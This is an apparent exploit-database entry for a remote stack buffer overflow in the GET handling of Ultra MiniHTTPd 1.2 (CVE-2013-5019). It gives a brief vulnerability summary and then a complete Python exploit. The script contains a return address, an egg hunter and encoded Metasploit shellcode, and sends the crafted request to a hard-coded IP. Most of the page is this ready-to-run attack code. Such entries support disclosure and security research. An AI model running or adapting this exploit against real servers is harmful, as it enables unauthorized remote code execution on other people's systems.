Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow

vendor:

Ultra MiniHTTPd

by:

jollymongrel

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Ultra MiniHTTPd

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: YES

Related CWE: CVE-2013-5019

CPE: a:vector:ultra_minihttpd:1.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 32-bit

2018

Ultra MiniHTTPd 1.2 – ‘GET’ Remote Stack Buffer Overflow

A buffer overflow vulnerability exists in Ultra MiniHTTPd 1.2 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability can be exploited remotely via a specially crafted HTTP GET request.

Mitigation:

Upgrade to the latest version of Ultra MiniHTTPd 1.2

Source

Exploit-DB raw data:

# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow
# Date: 2018-04-14
# Exploit Author: jollymongrel
# Vendor Homepage: http://www.vector.co.jp
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.2
# Tested on: Windows 7 32-bit
# CVE : CVE-2013-5019

import sys
import socket
import struct

eip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]

#windows/exec - 274 bytes
#http://www.metasploit.com
#Encoder: x86/shikata_ga_nai
#EXITFUNC=thread
#CMD=calc.exe
#badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f'
shellcode = ("no0bno0b"+"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8"
"\x25\xbd\x4c\xf4\x90\x35\x55\x0f\x79\x9f\x5c\x5e\x45\x5c\xb5"
"\x5d\x84\x31\x44\x9d\x46\xde\x89\xb2\x1a\x92\xe6\x1d\x26\x1d"
"\xa1\xb0\xfa\x6c\x5a\x1e\xf7\xb7\xb6\xfb\x71\xbf\x2a\x51\xb6"
"\x2a\x53\x27\x2a\x43\x49\x67\xe7\x66\x6a\x6e\xe3\x10\x46\x27"
"\xe5\x1f\xc5\xb5\xad\x32\x57\x38\xd3\x66\xa8\xa7\xf8\xe0\xfc"
"\x1a\x33\xce\x22\xf0\xad\x34\xff\x3a\x42\x91\x07\x6d\xe5\xf1"
"\x79\x73\xa3\xe9\xbf\xd7\xbf\xa7\x10\x06\xf2\x2c\x81\x6a\xa0"
"\x97\x46\xae\xe7\x33\x1c\x87\x02\x5d\x8d\xd7\x5a\xbe\x7c\xa9"
"\x96\x7f\x04\xbd\xe4\xb5\xbc\xa0\xf5\xf3\x12\x66\x6c\xbc\xb7"
"\xb2\x49\x01\x66\xd3\x8f\x40\x5b\x33\x07\x22\x30\x0e\x11\xc6"
"\x89\xfa\xbc\x18\x0f\x33\x18\xb1\x01\xe0\x53\x4a\x23\xab\x77"
"\x17\x7f\xf8\x4f\xdd\x01\x79\x04\xa6\x82\xe0\xc4\x33\x06\x12"
"\x36\x43\x2d\xc6\x8a\xfb\x24\x67\x4a\xc6\x5a\x4a\x4c\x97\x4c"
"\x1b\x68\x98\xf8\x45\x2d\x86\x43\xbe\x0e\x96\x8f\xca\x89\x7e"
"\x5b\xe1\x8b\xb2\x5f\xd0\x94\xdf\x5e\x7c\x0e\x25\xa5\xf7\xea"
"\x9d\x1b\xa9\x58\x50\x3a\xb8\x77\x16\xb1\x87\x48\x94\x37\x87"
"\x9a\x9d\xe2\xd0")

#egg hunter to search for no0bno0b
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x6e\x6f\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

payload = "A" * 537
payload += shellcode
payload += "A" * (967 - len(payload))
payload += eip
payload += egghunter
payload += "\xff\xe7" #jmp edi
payload += "C" * (1007 - len(payload))

print "[+] sending payload, length", len(payload)

buf = "GET /"+payload+"HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.32.175", 80))
s.send(buf)
data = s.recv(1024)
s.close()